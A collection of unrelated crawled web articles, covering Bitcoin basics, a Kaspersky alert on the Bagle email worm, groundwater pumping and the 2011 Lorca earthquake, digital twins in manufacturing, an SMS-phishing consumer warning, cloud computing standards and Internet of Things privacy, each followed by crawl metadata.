Credit systems such as Mastercard and Visa required centralised data processing to ensure correct flows and tracking of funds. Bitcoin’s processing consists of adding new transactions to the overall ledger and keeping track of balances in every account. This processing is decentralised in a distributed computing project – anyone can add their computer to the network to assist with the processing and will get paid in newly-issued Bitcoins, through a process called mining. It is this decentralised processing which provides the currency with protection from interference and resilience. Effective Bitcoin mining rigs are now very expensive however.
The Bitcoin currency is global and not controlled by any government or central body. The distributed computing code which checks the ledger after transactions is open source.
Anonymity is possible using the Bitcoin. For this reason it is the currency of choice in the dark web Silk Road marketplace accessible through the Tor network, where drugs are traded. This has attracted bad press for the currency.
Individual security comes from a public/private key infrastructure. Each account (or address) is identified by the public key. Payments made to an account are sent it to the address which is the public key. The private key associated with that address is used to make payments from the account. Individuals using the currency need to employ their own security measures to protect their private key. If the private key is lost, the Bitcoins at the address cannot be accessed. If the private key is stolen, someone else can access the Bitcoins. Users are encouraged to keep two accounts – one for everyday purchases where the private key is stored in a Wallet on their mobile phone, and the other (like a savings account) where larger amounts are stored and the private key is stored encrypted in a safe place. Backup copies should also be kept separately, in different locations and on different mediums.
Will Bitcoin make the world dance? Will it progress beyond a small group of drug dealers, libertarians, and computer geeks? Only time will tell. The concept is certainly interesting and fulfils certain needs. If its usage increases, the price will increase due to limited supply. Investors will be sure to keep an eye on it from this perspective, but Bitcoins are risky – you should not put more in than what you are prepared to lose. Some believe that Bitcoin could make Mastercard and Visa obsolete. If successful, Bitcoin certainly has the potential to have a disruptive effect on local currencies. | <urn:uuid:1466ca6d-3c5e-4632-93fc-008356e73622> | CC-MAIN-2017-09 | https://dwaterson.com/2013/06/30/bitcoin-its-all-about-the-money-money-money/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170521.30/warc/CC-MAIN-20170219104610-00512-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.947575 | 847 | 3 | 3 |
Bagle, a new Internet Worm, Makes Its Presence Felt
19 Jan 2004
Kaspersky Lab, a leading information security software developer is warning users about I-Worm.Bagle, a new Internet worm detected in the wild. The worm spreads via email with a random sender address. Kaspersky Lab has received reports of infections from around the world; Bagle is causing a significant outbreak.
The worm is a Windows EXE file about 15 KB in size attached to emails with random sender addresses. The subject, 'Hi', body, 'Test =)' and signature 'Test, yep' are constant, whereas the name of the attachment is random.
Once the worm is launched, it copies itself into the Windows directory and attempts to download and launch Mitglieder, a Trojan proxy server, on the infected machine. This proxy server allows the 'master' to use the infected machine as a platform to send more copies of the malicious code. Currently, all links to Internet sources for downloading Mitglieder are deleted. Thus, I-Worm.Bagle cannot use this technology to increase propagation speed.
As a result, at this time, I-Worm.Bagle is using a technique standard for Trojan programs. Bagle scans the file system on infected machines for files with extensions wab, txt, htm and r1. The worm then sends copies of itself to all email addresses that it uncovers, using a built in SMTP server.
Kaspersky® Anti-Virus databases have already been updated with protection against Bagle | <urn:uuid:2299c62d-5b7f-46e1-bd2d-a7ac1680e586> | CC-MAIN-2017-09 | http://www.kaspersky.com/au/about/news/virus/2004/Bagle_a_new_Internet_Worm_Makes_Its_Presence_Felt | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170794.46/warc/CC-MAIN-20170219104610-00036-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.862757 | 325 | 2.71875 | 3 |
MADRID (AP) — Farmers drilling ever deeper wells over decades to water their crops likely contributed to a deadly earthquake in southern Spain last year, a new study suggests. The findings may add to concerns about the effects of new energy extraction and waste disposal technologies.
Nine people died and nearly 300 were injured when an unusually shallow magnitude-5.1 quake hit the town of Lorca on May 11, 2011. It was the country's worst quake in more than 50 years, causing millions of euros in damage to a region with an already fragile economy.
Using satellite images, scientists from Canada, Italy and Spain found the quake ruptured a fault running near a basin that had been weakened by 50 years of groundwater extraction in the area.
During this period, the water table dropped by 250 meters (274 yards) as farmers bored ever deeper wells to help produce the fruit, vegetables and meat that are exported from Lorca to the rest of Europe. In other words, the industry that propped up the local economy in southern Spain may have undermined the very ground on which Lorca is built.
The researchers noted that even without the strain caused by water extraction, a quake would likely have occurred at some point.
But the extra stress of pumping vast amounts of water from a nearby aquifer may have been enough to trigger a quake at that particular time and place, said lead researcher Pablo J. Gonzalez of the University of Western Ontario, Canada.
Miguel de las Doblas Lavigne, a geologist with Spain's National Natural Science Museum who has worked on the same theory but was not involved in the study, said the Lorca quake was in the cards.
"This has been going on for years in the Mediterranean areas, all very famous for their agriculture and plastic greenhouses. They are just sucking all the water out of the aquifers, drying them out," he told The Associated Press in a telephone interview. "From Lorca to (the regional capital of) Murcia you can find a very depleted water level."
De las Doblas said it was "no coincidence that all the aftershocks were located on the exact position of maximum depletion."
"The reason is clearly related to the farming, it's like a sponge you drain the water from; the weight of the rocks makes the terrain subside and any small variation near a very active fault like the Alhama de Murcia may be the straw that breaks the camel(asterisk)s back, which is what happened," he said.
He said excess water extraction was common in Spain.
"Everybody digs their own well, they don't care about anything," he said. "I think in Lorca you may find that some 80 percent of wells are illegal."
Lorca town hall environment chief Melchor Morales said the problem dates back to the 1960s when the region opted to step up its agriculture production and when underground water was considered private property. A 1986 law has reduced the amount of well pumping, he said.
Not everyone agreed with the conclusion of the study, which was published online Sunday in Nature Geoscience.
"There have been earthquakes of similar intensity and similar damage caused in the 17th, 18th and 19th centuries when there was no excess water extraction," said Jose Martinez Diez, a professor in geodynamics at Madrid's Complutense University who has also published a paper on the quake.
Still, it isn't the first time that earthquakes have been blamed on human activity, and scientists say the incident points to the need to investigate more closely how such quakes are triggered and how to prevent them.
The biggest man-made quakes are associated with the construction of large dams, which trap massive amounts of water that put heavy pressure on surrounding rock.
The 1967 Koynanagar earthquake in India, which killed more than 150 people, is one such case, said Marco Bohnhoff, a geologist at the German Research Centre for Geosciences in Potsdam who wasn't involved in the Lorca study.
Bohnhoff said smaller man-made quakes can also occur when liquid is pumped into the ground.
A pioneering geothermal power project in the Swiss city of Basel was abandoned in 2009 after it caused a series of earthquakes. Nobody was injured, but the tremors caused by injecting cold water into hot rocks to produce steam resulted in millions of Swiss francs (dollars) damage to buildings.
Earlier this year, a report by the National Research Council in the United States found the controversial practice of hydraulic fracturing to extract natural gas was not a huge source of man-made earthquakes. However, the related practice of shooting large amounts of wastewater from "fracking" or other drilling activities into deep underground storage wells has been linked with some small earthquakes.
In an editorial accompanying the Lorca study, geologist Jean-Philippe Avouac of the California Institute of Technology said it was unclear whether human activity merely induces quakes that would have happened anyway at a later date. He noted that the strength of the quake appeared to have been greater than the stress caused by removing the groundwater.
"The earthquake therefore cannot have been caused entirely by water extraction," wrote Avouac. "Instead, it must have built up over several centuries."
Still, pumping out the water may have affected how the stress was released, and similar processes such as fracking or injecting carbon dioxide into the ground — an idea that has been suggested to reduce the greenhouse effect — could theoretically do the same, he said.
Once the process is fully understood, "we might dream of one day being able to tame natural faults with geo-engineering," Avouac said.
Jordans reported from Istanbul. Ciaran Giles in Madrid and AP Science Writer Alicia Chang in Los Angeles contributed to this report. | <urn:uuid:45a08675-17c3-4e7f-b61f-042abe570ce2> | CC-MAIN-2017-09 | http://www.continuityinsights.com/news/2012/10/scientists-link-deep-wells-deadly-spain-quake | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171646.15/warc/CC-MAIN-20170219104611-00564-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.9775 | 1,189 | 3.234375 | 3 |
The Digital Twin
How smart factories and connected assets in the emerging Industrial IoT era, together with the automation of machine learning and advances in artificial intelligence, can dramatically change the manufacturing process and put an end to dreaded product recalls.
In recent news, Samsung Electronics Co. initiated a global recall of 2.5 million of its Galaxy Note 7 smartphones after finding that the batteries of some phones exploded while charging. The recall is expected to cost the company close to $1 billion.
This is not a one-off incident.
Product recalls have plagued the manufacturing world for decades, from the food and drug industries to automotive, causing huge losses and risk to human life. In 1982, Johnson & Johnson recalled 31 million bottles of Tylenol, with a retail value of $100 million, after seven people died in the Chicago area. In 2000, Ford recalled 20 million Firestone tires, losing around $3 billion, after 174 people died in road accidents caused by faulty tires. In 2009, Toyota issued a recall of 10 million vehicles due to numerous issues, including gas pedals and faulty airbags, resulting in a $2 billion loss from repair expenses and lost sales, in addition to its stock price dropping more than 20 percent, or $35 billion.
Most manufacturers put their products through very stringent quality-control processes before they are shipped. How and why, then, do faulty products that pose serious risks to life and to the business still make it to market?
Koh Dong-jin, president of Samsung's mobile business, said that the cause of the battery issue in the Samsung Galaxy Note 7 was “a tiny problem in the manufacturing process and so it was very difficult to find out”. The same is true for most recalls: it is simply not possible to manually detect these seemingly “tiny” problems early enough, before they result in catastrophic outcomes.
But this won’t be the case in the future.
The manufacturing world has seen four transformative revolutions:
- The 1st Industrial Revolution brought in mechanization powered by water and steam.
- The 2nd Industrial Revolution saw the advent of the assembly line, powered by gas and electricity.
- The 3rd Industrial Revolution introduced robotic automation, powered by computing networks.
- The 4th Industrial Revolution has taken it to a completely different level, with smart and connected assets powered by machine learning and artificial intelligence.
It is this 4th Industrial Revolution, the one we are just embarking on, that has the potential to transform the face of the manufacturing world and create new economic value, to the tune of tens of trillions of dollars globally, from cost savings and new revenue generation. But why is this the most transformative of all the revolutions? Because it is this revolution that has transformed lifeless mechanical machines into digital life-forms, with the birth of the Digital Twin.
Digital Twin refers to the computerized companion (or model) of a physical asset that uses multiple internet-connected sensors on that asset to represent its near real-time status, working condition, position, and other key metrics that help us understand the health and functioning of the asset at a granular level. This lets us understand assets and asset health the way we understand humans and human health, with the ability to perform diagnosis and prognosis like never before.
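As a concrete (and deliberately simplified) illustration of the concept, a digital twin can be as little as a per-asset software record that accumulates time-stamped sensor readings and derives basic health indicators from them. The sketch below is only that, an illustration; the class, sensor names and health metric are invented for this article and are not DataRPM's implementation.

```python
from dataclasses import dataclass, field
from statistics import mean
from typing import Dict, List, Tuple


@dataclass
class DigitalTwin:
    """Hypothetical software companion for a single physical asset."""
    asset_id: str
    # sensor name -> list of (timestamp, value) readings from connected sensors
    readings: Dict[str, List[Tuple[float, float]]] = field(default_factory=dict)

    def ingest(self, sensor: str, timestamp: float, value: float) -> None:
        """Record one near real-time reading from an internet-connected sensor."""
        self.readings.setdefault(sensor, []).append((timestamp, value))

    def health(self, sensor: str, window: int = 100) -> float:
        """Toy health indicator: the recent average of one sensor's readings."""
        recent = [v for _, v in self.readings.get(sensor, [])[-window:]]
        return mean(recent) if recent else float("nan")


# One twin per asset on the line
twin = DigitalTwin(asset_id="battery-cell-welder-07")
twin.ingest("temperature_c", timestamp=1472688000.0, value=41.2)
print(twin.health("temperature_c"))
```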
How can this solve the recall problem?
Sensor-enabling the assembly line and creating a Digital Twin of every individual asset and workflow provides timely insight into the tiniest of issues that can otherwise easily be missed in a manual inspection process. Causes can be detected, and potential product-quality issues predicted, right on the assembly line, as early as possible, so that manufacturers can take proactive action to resolve them before they start snowballing. This can not only prevent recalls but also reduce scrap on the assembly line, taking operational efficiency to unprecedented heights.
What stands in the way? Why hasn't this problem been solved by most organizations that have already smart-enabled their factories?
The traditional approach to data science and machine learning doesn't scale for this problem. Traditionally, predictive models are created by taking a sample of data from a sample of assets, and these models are then generalized to predict issues on all assets. While this can detect common, known issues, which would otherwise be caught in the quality-control process itself, it fails to detect the rare events that cause the massive recalls. Rare events have failure patterns that don't commonly occur in the assets or on the assembly line. Highly sensitive generalized models can be built to detect any and all deviations, but they generate a flood of false-positive alerts, which causes a different series of problems altogether. The only way to ensure accurate models that flag only true issues is to model each asset and workflow channel individually, learn their respective normal operating conditions and detect their respective deviations. This is what makes the challenge beyond human scale. When there are hundreds, thousands or millions of assets and components, it is impossible to keep generating and updating models for each one of them manually. It requires automation of the predictive modeling and the machine learning process itself, as putting human data scientists in the loop doesn't scale.
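To make the one-model-per-asset argument concrete, here is a minimal sketch that fits an individual baseline for every asset and flags deviations from that asset's own normal operating condition. The threshold rule, data layout and numbers are illustrative assumptions, not the actual method used by DataRPM.

```python
import random
from statistics import mean, pstdev


def fit_baseline(history):
    """Learn one asset's normal operating condition (here just mean and spread)."""
    return mean(history), pstdev(history)


def is_anomalous(value, baseline, k=4.0):
    """Flag a reading that deviates strongly from this asset's own baseline."""
    mu, sigma = baseline
    return sigma > 0 and abs(value - mu) > k * sigma


# One model per asset, refreshed automatically: no shared, generalized model.
random.seed(0)
histories = {f"asset-{i:03d}": [random.gauss(50 + i, 2.0) for _ in range(500)]
             for i in range(100)}
baselines = {aid: fit_baseline(h) for aid, h in histories.items()}

new_readings = {"asset-001": 51.3, "asset-042": 120.0}   # the second is a rare event
alerts = {aid: v for aid, v in new_readings.items()
          if is_anomalous(v, baselines[aid])}
print(alerts)   # only the genuinely deviating asset is flagged
```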
But aren’t there standard approaches or scripts to automate predictive modeling?
Yes, there are. However, plain-vanilla automation of the modeling process, which simply runs all permutations of algorithms and hyper-parameters, again doesn't work. The number of assets (and therefore of individual models), the frequency at which models need to be updated to capture newer real-world events, the volume of the data and the wide variety of sensor attributes all create prohibitive computational complexity (think millions or billions of permutations), even with infinite infrastructure to process them. The only solution is Cognitive Automation: an intelligent process that mimics how a human data scientist leverages prior experience to run fewer experiments and reach an optimal ensemble of models in the fastest possible way. In short, this is about teaching machines to do machine learning and data science, like an A.I. Data Scientist.
This is the technology that is required to give Digital Twin a true life-form that delivers the end business value – in this case to prevent recalls.
Does it sound like sci-fi?
It isn’t and it is already happening with the advancement in the world of machine learning and artificial intelligence. Companies like Google are using algorithms to create self-driving cars or beat world champions in complex games. At the same time, we at DataRPM are using algorithms to teach machines to do data analysis and detect asset failures and quality issues on the assembly line. This dramatically improves operational efficiency and prevents the product recalls.
The future, where the dreaded product recalls will be a thing of the past, is almost here!
By Ruban Phukan, Co-Founder and Chief Product & Analytics Officer, DataRPM | <urn:uuid:b9084231-eba9-43aa-a1a1-6acf09be7c20> | CC-MAIN-2017-09 | https://cloudtweaks.com/2016/09/digital-twin-end-dreaded-product-recall/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501172783.57/warc/CC-MAIN-20170219104612-00264-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.942158 | 1,380 | 2.703125 | 3 |
“SMiShing” is a silly word—even sillier than “phishing,” but equally dangerous.
Phishing occurs when scammers send emails that appear to have been sent by legitimate, trusted organizations in order to lure recipients into clicking links and entering login data and other credentials. The term is a reference to the scammers’ strategy of luring the victim with bait and thus, fishing for personal information.
SMiShing is a version of phishing in which scammers send text messages rather than emails, which appear to have been sent by a legitimate, trusted organization and request that the recipient click on a link or provide credentials in a text message reply. The term is a condensed way of referring to “short message service phishing,” or “SMS phishing.”
Criminal hackers have access to technology that generates cell phone numbers by starting with an area code, plugging in a cell carrier's known prefix, and then generating the last four digits. They then use a mass text messaging service to distribute their SMiShing bait. (An online search for “mass sms software” turns up plenty of free and low-fee programs that facilitate mass texting.)
This ruse tends to be effective because while most of us have learned to recognize phishing emails, we are still conditioned to trust text messages. Also, there’s no easy way for us to preview links in a text message like we can if we are viewing an email on a PC.
Some SMiShers send texts with links that, if clicked, will install keyloggers or lead to malicious websites designed to steal personal data, while others trick targets into calling numbers that rack up outrageous charges to their phone bills.
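As a rough idea of what the SMS filtering mentioned below can do, a filter can look for the combination of a link and pressure language before a user ever taps anything. The keyword list and regular expression here are invented for illustration and would be far more sophisticated in a real product.

```python
import re

PRESSURE_PHRASES = ("urgent", "suspended", "verify", "prize", "act now")
URL_PATTERN = re.compile(r"https?://\S+", re.IGNORECASE)


def looks_like_smishing(message: str) -> bool:
    """Crude heuristic: a link plus pressure language is worth distrusting."""
    has_link = bool(URL_PATTERN.search(message))
    has_pressure = any(p in message.lower() for p in PRESSURE_PHRASES)
    return has_link and has_pressure


print(looks_like_smishing(
    "URGENT: your account is suspended, verify at http://bank-secure.example"))  # True
print(looks_like_smishing("Running late, see you at 7"))                         # False
```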
To protect yourself from SMiShing:
- Be aware of how this type of scam works. Once you understand how it works, you are better positioned to recognize smishing
- Avoid clicking links within text messages, especially if they are sent from someone you don’t know
- Don’t respond to text messages requesting personal information
- Consider using a comprehensive mobile security application that includes SMS (text) filtering as well as anti-theft, antivirus and web protection like McAfee Mobile Security. | <urn:uuid:faa2505d-0beb-446a-bde3-6ec9d7493d42> | CC-MAIN-2017-09 | https://securingtomorrow.mcafee.com/consumer/family-safety/protect-yourself-from-smishing/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171281.53/warc/CC-MAIN-20170219104611-00085-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.919448 | 471 | 3.140625 | 3 |
Necessity is the mother of invention – Plato
Gartner’s “Hype Cycle for Emerging Technologies 2012” predicts that cloud computing will reach a plateau of productivity in 2-5 years’ time. The key enabling technologies for this are fast wide area networks, powerful expensive server computers and high performance virtualization for commodity hardware. However, a lack of standardization to guide development, deployment and integration efforts around technical challenges like interoperability, portability and reusability, and business concerns like security/compliance, regulation/jurisdiction and vendor lock-in are cited as major barriers for wider adoption and success.
The NIST (National Institute of Standards and Technology) cloud computing standards roadmap report, published in 2011, documents the fact that broad standards are already available in support of certain functions and requirements for cloud computing. While most of these standards were developed in support of pre-cloud computing technologies, such as those designed for web services and the Internet, they also support the functions and requirements of cloud computing. Other standards are now being developed specifically in support of cloud computing functions and requirements, such as virtualization.
The NIST report further states that, from a standardization point of view, the cloud interfaces presented to cloud users can be broken down into two major categories, with interoperability determined separately for each category.
The interface that is presented to (or by) the contents of the cloud encompasses the primary function of the cloud service. This is distinct from the interface that is used to manage the use of the cloud service.
To understand this in Infrastructure as a Service (IaaS) terms, the NIST report explains that the functional interface is a virtualized Central Processing Unit (CPU), memory and input/output (I/O) space, typically used by an operating system (and the stack of software running in that operating system [OS] instance).
The cloud user utilizes the management interface to control their use of the cloud service by starting, stopping, and manipulating virtual machine images and associated resources. It should be clear from this that the functional interface for an IaaS cloud is very much tied to the architecture of the CPU being virtualized. This is not a cloud-specific interface, and no effort is being put into a de jure standard for this interface since de facto CPU architectures are the norm.
The self-service IaaS management interface, however, is a candidate for interoperability standardization.
From a functional viewpoint, Platform as a Service (PaaS) is a set of libraries and components against which the application is written, mostly to take advantage of existing application platform standards such as those found in J2EE or .NET.
SaaS applications leverage the standards designed for web services and the internet.
Apart from interoperability, there is a lot of focus on cloud portability as the means to prevent being locked into any particular cloud or service provider. Portability is generally the ability to move applications and data from one computing environment to another. Standards are fundamental to achieve portability.
Security, ensuring the confidentiality, integrity and availability of information and information systems, forms the third aspect where a standardized approach is warranted to alleviate the high-priority concerns and perceived risks related to cloud computing.
Forrester predicts IaaS will become more standardized by 2015, which is somewhat in line with Gartner’s hype cycle prediction. There’s a lot of effort taking place which is worth looking at.
DMTF’s (Distributed Management Task Force, Inc.) Virtualization Management (VMAN) Virtualization Profiles have achieved ANSI adoption. As DTMF defines it, the VMAN standard is comprised of two components: the Open Virtualization Format (OVF) specification, which provides a standard format for packaging and describing virtual machines and applications for deployment across virtualization platforms, and the Virtualization Profiles, which standardize many aspects of the operational management of a virtualized environment. Together, these components deliver broadly supported interoperability and portability standards to virtual computing environments for deploying pre-configured solutions across heterogeneous computing networks.4
Next in line from the DMTF stable is CIMI (Cloud Infrastructure Management Interface). Version one has been released, and the specification standardizes interactions between cloud environments to achieve interoperable cloud infrastructure management between service providers and their consumers and developers. CIMI is developed as a self-service interface for infrastructure clouds which allows users to dynamically provision configure and administer their cloud usage.4
Coming to data portability, SNIA (Storage Networking Industry Association) is behind CDMI, which defines the functional interface that applications will use to create, retrieve, update and delete data elements from the cloud. As part of this interface, the client will be able to discover the capabilities of the cloud storage offering and use the interface to manage containers and the data that is placed in them. In addition, metadata can be set on containers and their contained data elements through this interface.5
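As a rough sketch of the kind of functional interface CDMI standardizes, the snippet below creates a data object with metadata inside a container and reads it back over HTTP. The endpoint is a placeholder and the header values are assumptions based on the CDMI specification; consult the SNIA documents for the exact resource paths, media types and version header.

```python
import requests

BASE = "https://cloud.example.com/cdmi"            # hypothetical provider endpoint
HEADERS = {
    "X-CDMI-Specification-Version": "1.0.2",       # assumed version header
    "Content-Type": "application/cdmi-object",     # assumed data-object media type
    "Accept": "application/cdmi-object",
}

# Create (or update) a data element inside a container, with user metadata.
body = {"value": "hello cloud", "metadata": {"owner": "analytics-team"}}
requests.put(f"{BASE}/reports/summary.txt", json=body, headers=HEADERS, timeout=10)

# Retrieve it again, including the metadata that was set on the object.
obj = requests.get(f"{BASE}/reports/summary.txt", headers=HEADERS, timeout=10).json()
print(obj.get("metadata"))
```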
Service-Oriented Cloud Computing Infrastructure Framework (SOCCI), made available by the Open Group, is for enterprises that wish to provide infrastructure as a service in the cloud and SOA. It outlines the concepts and architectural building blocks necessary for infrastructures to support SOA and cloud initiatives.
On the open source side, OpenStack, the initiative with the largest vendor community, is creating a lot of de facto standards for operating systems that will be deployed on the cloud.
Open Cloud Computing Interface (OCCI) published by Open Grid Forum, is a RESTful boundary protocol and API that acts as a service front-end to a provider’s internal management framework. OCCI describes APIs that enable cloud providers to expose their services. It allows the deployment, monitoring and management of virtual workloads (like virtual machines), but is applicable to any interaction with a virtual cloud resource through defined http(s) header fields and extensions. 6 OCCI endpoints can function either as service providers or service consumers, or both. Further, the OCCI working group and the OpenStack team are working together to deliver an OCCI implementation in OpenStack.
The nonspecific web and internet technology standards enabling the cloud are TCP/IP, HTTP, HTML, SSL, TLS XML, JSON, DNS, etc.
Another point worth mentioning here is SDN (Software-Defined Networking) and how it will impact cloud computing. The SDN approach enables virtual networking with elastic resource allocation, an engineering realization of the network reacting to application requirements.
SDN separates the control plane from the data plane in network switches and routers. Under SDN, the control plane is implemented in software in servers separate from the network equipment, and the data plane is implemented in commodity network equipment. The Open Networking Foundation has specified the OpenFlow protocol standard as an implementation of SDN.
Now, what we get by combining all of these is a shared pool of configurable computing resources, e.g., networks, servers and storage, that can be rapidly provisioned, orchestrated and released in a standardized way.
The industry is already warming up to this prospect, which is evident from the early steps taken in this direction. Notable is CISCO’s ONE (Open Network Environment) that brings together CISCO, OpenStack and OpenFlow.
A few questions still remain to be answered. How do industry behemoths VMware and Microsoft plan to integrate standardization in their next product plan? What role could TSPs/carriers play in shaping standardization for cloud computing? Read about HCL's suite of services here.
- Hype Cycle – http://www.gartner.com/it/page.jsp?id=2124315
- NIST – http://www.nist.gov/itl/cloud/index.cfm#
- Forrester – http://blogs.forrester.com/james_staten/11-12-02-when_will_we_have_iaas_cloud_standards_not_till_2015
- DMTF – http://dmtf.org/
- CDMI – http://www.snia.org/cdmi
- SOCCI – http://www.opengroup.org/soa/source-book/socci/intro.htm
- CISCO – http://www.theregister.co.uk/2012/06/14/cisco_one_sdn_openflow_openstack/ | <urn:uuid:887192e7-d12d-47ae-aa83-6965274f08d5> | CC-MAIN-2017-09 | https://www.hcltech.com/blogs/engineering-and-rd-services/cloud-computing-standards | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171281.53/warc/CC-MAIN-20170219104611-00085-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.913955 | 1,756 | 2.546875 | 3 |
Major Characteristics of Simulation
Simulation is a specialized type of modeling tool. Most models represent or abstract reality, while simulation models usually try to imitate reality. In practical terms, this means that there are fewer simplifications of reality in simulation models than in other quantitative models. Simulation models are generally complex.
Second, simulation is a technique for performing "What-If" analysis over multiple time periods or events. Therefore, simulation involves the testing of specific values of the decision or uncontrollable variables in the model and observing the impact on the output variables.
Simulation is a descriptive tool that can be used for prediction. A simulation describes and sometimes predicts the characteristics of a given system under different circumstances. Once these characteristics are known, alternative actions can be selected. The simulation process often consists of the repetition of a test or experiment many times to obtain an estimate of the overall effect of certain actions on the system.
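A tiny example makes the repetition idea concrete: below, a single "what-if" experiment is replicated many times for several values of a decision variable (staffing level), and the averaged outcomes describe the system under each alternative. The demand model is deliberately simplistic and every number is made up.

```python
import random


def simulate_day(num_servers, service_rate=30):
    """One experiment: how much demand a given staffing level fails to serve."""
    demand = sum(random.random() < 0.5 for _ in range(400))   # noisy daily demand
    capacity = num_servers * service_rate
    return max(0, demand - capacity)


def estimate_unserved(num_servers, replications=10_000):
    """Repeat the experiment many times and average the effect (what-if analysis)."""
    return sum(simulate_day(num_servers) for _ in range(replications)) / replications


random.seed(42)
for servers in (5, 6, 7):            # test specific values of the decision variable
    print(servers, round(estimate_unserved(servers), 2))
```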
Finally, simulation is usually needed when the problem under investigation is too complex to be evaluated using optimization models. Complexity means that the problem cannot be formulated for optimization because assumptions do not hold or because the optimization formulation is too large and complex. | <urn:uuid:5620387c-2faa-457f-9c61-1d6ddab31b80> | CC-MAIN-2017-09 | http://dssresources.com/subscriber/password/dssbookhypertext/ch9/page20.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171971.82/warc/CC-MAIN-20170219104611-00437-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.915422 | 232 | 3.46875 | 3 |
There is really so much junk floating around in space that the government needs help keeping track of it all. This week the Defense Advanced Research Projects Agency announced a program to enlist amateur astronomers to help watch space for any dangerous junk that may be threatening satellites, other spacecraft or even the Earth. If you have a telescope, great; but the program will even install equipment if you are in a strategic area the government wants to watch.
DARPA's program, known as SpaceView, is strategically aimed at offering more diverse data to the Space Surveillance Network (SSN), a US Air Force program charged with cataloguing and observing space objects to identify potential near-term collisions.
With SpaceView, DARPA will provide state-of-the-art hardware, and "relatively minor financial compensation may be provided in exchange for the shared telescope time, site security, and routine maintenance. This allows the SpaceView concept to significantly reduce deployment costs when compared to traditional optical space-surveillance facilities. Equally important, remote observing and the availability of the local SpaceView member for troubleshooting eliminates the need for any paid employees at the site, further decreasing operational costs," DARPA stated.
According to the agency, SpaceView is in its initial developmental phase which consists of developing the network architecture and demonstrating the ability to remotely and automatically operate a network of sites from a central location. A large part of developing the network architecture consists of determining the needs of the amateur astronomy community so that these needs can be aligned with the space surveillance needs of SpaceView, DARPA stated.
If you are interested in signing up, go here. According to DARPA, by providing contact information and the answers to a few basic questions, you will help the agency begin gathering the information it needs to develop the network architecture concept more thoroughly. Once your information has been received by SpaceView, interested parties will most likely receive a link via email to a questionnaire requesting more detailed information regarding your astronomy background, observing habits and other demographic information. This information will be used by SpaceView to determine the habits and needs of candidate network members.
NASA estimates more than 500,000 pieces of hazardous space debris orbit the earth, threatening satellites that support peacekeeping and combat missions.
Examples of what NASA calls orbital debris include: "Derelict spacecraft and upper stages of launch vehicles, carriers for multiple payloads, debris intentionally released during spacecraft separation from its launch vehicle or during mission operations, debris created as a result of spacecraft or upper stage explosions or collisions, solid rocket motor effluents, and tiny flecks of paint released by thermal stress or small particle impacts. "
According to NASA the Top 10 space junk producing missions are:
Name | Year of Breakup | Debris Items | Cause of Breakup
- Fengyun-1C | 2007 | 2,841 | Intentional Collision
- Cosmos 2251 | 2009 | 1,267 | Accidental Collision
- STEP 2 Rocket Body | 1996 | 713 | Accidental Explosion
- Iridium 33 | 2009 | 521 | Accidental Collision
- Cosmos 2421 | 2008 | 509 | Unknown
- SPOT 1 Rocket Body | 1986 | 492 | Accidental Explosion
- OV2-1 Rocket Body | 1965 | 473 | Accidental Explosion
- Nimbus 4 Rocket Body | 1970 | 374 | Accidental Explosion
- TES Rocket Body | 2001 | 370 | Accidental Explosion
- CBERS 1 Rocket Body | 2000 | 343 | Accidental Explosion
| <urn:uuid:8c5c6509-d8e0-4621-8407-12f11f0bced2> | CC-MAIN-2017-09 | http://www.networkworld.com/article/2223503/security/darpa-wants-army-of-networked-amateur-astronomers-to-watch-sky-for-space-junk.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171971.82/warc/CC-MAIN-20170219104611-00437-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.89902 | 687 | 3.015625 | 3 |
The “Internet of Things” is here.
Americans are adapting to a world in which virtually everything — from cellphones and cars to washing machines and refrigerators — is going to be connected to the Internet or networks. Many of these devices will — and do — “talk” to one another via tiny sensors that function almost like human senses, logging information such as temperature, light, motion and sound.
Theoretically, the sensors could allow a new refrigerator, for example, to send an alert to a homeowner’s smartphone whenever the fridge is running low on milk. This concept of device conversation is known as the Internet of Things. The technology will make life easier, but it also means more people are vulnerable to device malfunction or hacking.
Experts and government officials acknowledge the transformative power of the Internet of Things. But the authors of a White House report in May on the effects of big data — including all the information that devices collect — are also concerned about the potential for privacy abuses that comes with the technology.
These innovations raise “considerable questions about how our framework for privacy protection applies in a big data ecosystem,” the report says. And the rate of development is only picking up pace.
Deepti Rohatgi, a policy adviser at Lookout, a mobile security firm in San Francisco, said that each day more than 30,000 new apps were created for almost a billion mobile devices. Further, a 2011 report from Cisco Systems, which designs, makes and sells computer networking devices, projected that by the year 2020, some 50 billion devices will be connected to the Internet or networks, an average of just under seven connected devices per person.
Rohatgi said that one of the ways to ensure information security was to follow the example of Google Glass, a wearable computer that looks like eyeglasses but works like a smartphone.
Google launched an “Explorer Program” last year that allowed individuals — specifically developers and hackers — an opportunity to test the prototype. Not only did this give Google a chance see how the public would react to the technology, but it also allowed people with technical know-how to alert Google to potential privacy problems they found in the new product.
That’s exactly what happened, Rohatgi said.
“Lookout got ahold of a Google Glass and we found a vulnerability with some of their software,” she said. “We reported it to Google, and they patched it immediately. That’s a great example of how they were willing to share their technology with a group of hackers to say, ‘Help us find what the problems are before they’re released to the public.’ “
The White House report cites several examples of how tech innovation and big data are being used.
Lights can detect sound, speed, temperature and carbon monoxide levels from parking lots, schools and public streets; vehicles can record driving data that can be used to build better and safer transportation systems; and some home appliances can tell owners when to dim lights even when they’re thousands of miles away.
Most of the data these devices collect is innocuous. But there's still a chance, if small, that third parties could hack in and get very detailed pictures of their users' lives. Worse, it's possible that a malfunction — with, say, a "smart" toaster — might cause a fire when no one is home, or that a malicious person could hack into a car that's traveling on the interstate at 70 mph.
